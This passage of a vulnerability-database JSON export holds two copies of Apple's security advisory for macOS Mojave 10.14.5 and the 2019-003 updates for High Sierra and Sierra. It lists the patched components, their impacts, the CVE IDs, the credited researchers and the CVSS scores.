corruption issue was addressed with improved memory handling.\n\nCVE-2019-8616: Lilang Wu and Moony Li of Trend Micro Mobile Security Research Team working with Trend Micro's Zero Day Initiative\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2019-8629: Arash Tohidi of Solita Oy\n\n**IOAcceleratorFamily**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4456: Tyler Bohan of Cisco Talos\n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: A local user may be able to load unsigned kernel extensions\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8606: Phoenhex and qwerty (@_niklasb, @qwertyoruiopz, @bkth_) working with Trend Micro's Zero Day Initiative\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.4, macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8633: Zhuo Liang of Qihoo 360 Vulcan Team\n\nEntry added July 25, 2019, updated September 17, 2019\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2019-8525: Zhuo Liang and shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added May 14, 2019\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2019-8547: derrek (@derrekr6)\n\nEntry added May 14, 2019\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8576: Brandon Azad of Google Project Zero, Junho Jang and Hanul Choi of LINE Security Team\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-8591: Ned Williamson working with Google Project Zero\n\n**Messages**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A remote attacker may be able to cause a system denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8573: natashenka of Google Project Zero\n\nEntry added July 3, 2019\n\n**Messages**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Users removed from an iMessage conversation may still be able to alter state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8631: Jamie Bishop of Dynastic\n\nEntry added August 1, 2019\n\n**Microcode**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Load ports, fill buffers, and store buffers in systems with microprocessors utilizing speculative execution may allow an attacker with local user access to potentially enable information disclosure via a side channel\n\nDescription: Multiple information disclosure issues were addressed partially by updating the microcode and changing the OS scheduler to isolate the system from web content running in the browser. To completely address these issues, there are additional opt-in mitigations to disable hyper threading and enable microcode-based mitigations for all processes by default. Details of the mitigations can be found at <https://support.apple.com/kb/HT210107>.\n\nCVE-2018-12126: Ke Sun, Henrique Kawakami, Kekai Hu, and Rodrigo Branco from Intel; Lei Shi - Qihoo 360 CERT; Marina Minkin; Daniel Genkin from University of Michigan; and Yuval Yarom from University of Adelaide\n\nCVE-2018-12127: Brandon Falk from Microsoft Windows Platform Security Team; and Ke Sun, Henrique Kawakami, Kekai Hu, and Rodrigo Branco from Intel\n\nCVE-2018-12130: Giorgi Maisuradze from Microsoft Research; Ke Sun, Henrique Kawakami, Kekai Hu, and Rodrigo Branco from Intel; Moritz Lipp, Michael Schwarz, and Daniel Gruss from Graz University of Technology; Stephan van Schaik, Alyssa Milburn, Sebastian Osterlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida from VUSec group at VU Amsterdam; Volodymyr Pikhur; and Dan Horea Lutas from BitDefender\n\nCVE-2019-11091: Ke Sun, Henrique Kawakami, Kekai Hu, and Rodrigo Branco from Intel; and Moritz Lipp, Michael Schwarz, and Daniel Gruss from Graz University of Technology\n\nEntry added May 14, 2019\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8604: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\n**SQLite**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**StreamingZip**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**sysdiagnose**\n\nAvailable for: macOS Sierra 10.12.6, macOS Mojave 10.14.4, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)\n\nEntry updated March 26, 2021\n\n**Touch Bar Support**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8569: Viktor Oreshkin (@stek29)\n\n**WebKit**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\n**WebKit**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**Wi-Fi**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: An attacker in a privileged network position can modify driver state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\nEntry added May 14, 2019\n\n\n\n## Additional recognition\n\n**CoreAudio**\n\nWe would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance.\n\nEntry added July 25, 2019\n\n**CoreFoundation**\n\nWe would like to acknowledge m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab, Vozzie, and Rami for their assistance.\n\nEntry updated May 14, 2019\n\n**Kernel**\n\nWe would like to acknowledge Denis Kopyrin for their assistance.\n\nEntry updated May 14, 2019\n\n**PackageKit**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Michael Ball of Gradescope by Turnitin for their assistance.\n\n**System Preferences**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 26, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-13T00:00:00", "type": "apple", "title": "About the security content of macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12126", "CVE-2018-12127", "CVE-2018-12130", "CVE-2018-4456", "CVE-2019-11091", "CVE-2019-2102", "CVE-2019-6237", "CVE-2019-8525", "CVE-2019-8547", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8569", "CVE-2019-8571", "CVE-2019-8573", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8582", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8589", "CVE-2019-8590", "CVE-2019-8591", "CVE-2019-8592", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8603", "CVE-2019-8604", "CVE-2019-8606", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8612", "CVE-2019-8615", "CVE-2019-8616", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628", "CVE-2019-8629", "CVE-2019-8631", "CVE-2019-8633", "CVE-2019-8634", "CVE-2019-8635", "CVE-2019-8640"], "modified": "2019-05-13T00:00:00", "id": "APPLE:F140693073F19FD842C6915DBBBD6D8D", "href": "https://support.apple.com/kb/HT210119", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:10", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra\n\nReleased May 13, 2019\n\n**Accessibility Framework**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8603: Phoenhex and qwerty (@_niklasb, @qwertyoruiopz, @bkth_) working with Trend Micro's Zero Day Initiative\n\n**AMD**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8635: Lilang Wu and Moony Li of TrendMicro Mobile Security Research Team working with Trend Micro's Zero Day Initiative\n\n**Application Firewall**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2019-8590: The UK\u2019s National Cyber Security Centre (NCSC)\n\n**Archive Utility**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2019-8640: Ash Fox of Fitbit Product Security\n\nEntry added August 1, 2019\n\n**Bluetooth**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Due to a misconfiguration in the Bluetooth pairing protocols of a Bluetooth Low Energy (BLE) version of FIDO Security Keys it may be possible for an attacker with physical proximity to be able to intercept Bluetooth traffic during pairing\n\nDescription: This issue was addressed by disabling accessories with insecure Bluetooth connections. Customers using the Bluetooth Low Energy (BLE) version of the Titan Security Key by Google should review Android\u2019s June Bulletins and Google\u2019s advisory and take appropriate action.\n\nCVE-2019-2102: Matt Beaver and Erik Peterson of Microsoft Corp.\n\nEntry added September 17, 2019\n\n**CoreAudio**\n\nAvailable for: macOS Sierra 10.12.6, macOS Mojave 10.14.4, macOS High Sierra 10.13.6\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**CoreAudio**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\n**CoreText**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added July 25, 2019\n\n**DesktopServices**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2019-8589: Andreas Clementi, Stefan Haselwanter, and Peter Stelzhammer of AV-Comparatives\n\n**Disk Images**\n\nAvailable for: macOS Sierra 10.12.6, macOS Mojave 10.14.4, macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University\n\nEntry updated May 14, 2019\n\n**EFI**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A user may be unexpectedly logged in to another user\u2019s account\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2019-8634: Jenny Sprenger and Maik Hoepfel\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8616: Lilang Wu and Moony Li of Trend Micro Mobile Security Research Team working with Trend Micro's Zero Day Initiative\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2019-8629: Arash Tohidi of Solita Oy\n\n**IOAcceleratorFamily**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4456: Tyler Bohan of Cisco Talos\n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: A local user may be able to load unsigned kernel extensions\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8606: Phoenhex and qwerty (@_niklasb, @qwertyoruiopz, @bkth_) working with Trend Micro's Zero Day Initiative\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.4, macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8633: Zhuo Liang of Qihoo 360 Vulcan Team\n\nEntry added July 25, 2019, updated September 17, 2019\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2019-8525: Zhuo Liang and shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added May 14, 2019\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2019-8547: derrek (@derrekr6)\n\nEntry added May 14, 2019\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8576: Brandon Azad of Google Project Zero, Junho Jang and Hanul Choi of LINE Security Team\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-8591: Ned Williamson working with Google Project Zero\n\n**Messages**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A remote attacker may be able to cause a system denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8573: Natalie Silvanovich of Google Project Zero\n\nEntry added July 3, 2019\n\n**Messages**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Users removed from an iMessage conversation may still be able to alter state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8631: Jamie Bishop of Dynastic\n\nEntry added August 1, 2019\n\n**Microcode**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Load ports, fill buffers, and store buffers in systems with microprocessors utilizing speculative execution may allow an attacker with local user access to potentially enable information disclosure via a side channel\n\nDescription: Multiple information disclosure issues were addressed partially by updating the microcode and changing the OS scheduler to isolate the system from web content running in the browser. To completely address these issues, there are additional opt-in mitigations to disable hyper threading and enable microcode-based mitigations for all processes by default. Details of the mitigations can be found at <https://support.apple.com/kb/HT210107>.\n\nCVE-2018-12126: Ke Sun, Henrique Kawakami, Kekai Hu, and Rodrigo Branco from Intel; Lei Shi - Qihoo 360 CERT; Marina Minkin; Daniel Genkin from University of Michigan; and Yuval Yarom from University of Adelaide\n\nCVE-2018-12127: Brandon Falk from Microsoft Windows Platform Security Team; and Ke Sun, Henrique Kawakami, Kekai Hu, and Rodrigo Branco from Intel\n\nCVE-2018-12130: Giorgi Maisuradze from Microsoft Research; Ke Sun, Henrique Kawakami, Kekai Hu, and Rodrigo Branco from Intel; Moritz Lipp, Michael Schwarz, and Daniel Gruss from Graz University of Technology; Stephan van Schaik, Alyssa Milburn, Sebastian Osterlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida from VUSec group at VU Amsterdam; Volodymyr Pikhur; and Dan Horea Lutas from BitDefender\n\nCVE-2019-11091: Ke Sun, Henrique Kawakami, Kekai Hu, and Rodrigo Branco from Intel; and Moritz Lipp, Michael Schwarz, and Daniel Gruss from Graz University of Technology\n\nEntry added May 14, 2019\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8604: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\n**SQLite**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**StreamingZip**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**sysdiagnose**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)\n\n**Touch Bar Support**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8569: Viktor Oreshkin (@stek29)\n\n**WebKit**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\n**WebKit**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**Wi-Fi**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: An attacker in a privileged network position can modify driver state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\nEntry added May 14, 2019\n\n\n\n## Additional recognition\n\n**CoreAudio**\n\nWe would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance.\n\nEntry added July 25, 2019\n\n**CoreFoundation**\n\nWe would like to acknowledge m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab, Vozzie, and Rami for their assistance.\n\nEntry updated May 14, 2019\n\n**Kernel**\n\nWe would like to acknowledge Denis Kopyrin for their assistance.\n\nEntry updated May 14, 2019\n\n**PackageKit**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Michael Ball of Gradescope by Turnitin for their assistance.\n\n**System Preferences**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-09T01:52:48", "title": "About the security content of macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12126", "CVE-2019-8603", "CVE-2019-8568", "CVE-2019-8635", "CVE-2019-8608", "CVE-2019-8633", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8577", "CVE-2019-8612", "CVE-2019-8592", "CVE-2019-8591", "CVE-2019-8547", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8602", "CVE-2019-8604", "CVE-2019-8606", "CVE-2019-8560", "CVE-2019-8594", "CVE-2019-8585", "CVE-2019-8622", "CVE-2018-12127", "CVE-2019-8590", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8629", "CVE-2019-8616", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8640", "CVE-2019-8596", "CVE-2019-8582", "CVE-2019-8634", "CVE-2019-8525", "CVE-2019-8619", "CVE-2019-8631", "CVE-2019-8589", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-2102", "CVE-2019-8573", "CVE-2019-8598", "CVE-2019-8600", "CVE-2018-4456", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8574", "CVE-2019-8623", "CVE-2019-11091", "CVE-2019-8576", "CVE-2019-8609", "CVE-2019-8595", "CVE-2018-12130", "CVE-2019-8569"], "modified": "2019-10-09T01:52:48", "id": "APPLE:HT210119", "href": "https://support.apple.com/kb/HT210119", "cvss": {"score": 9.3, "vector": 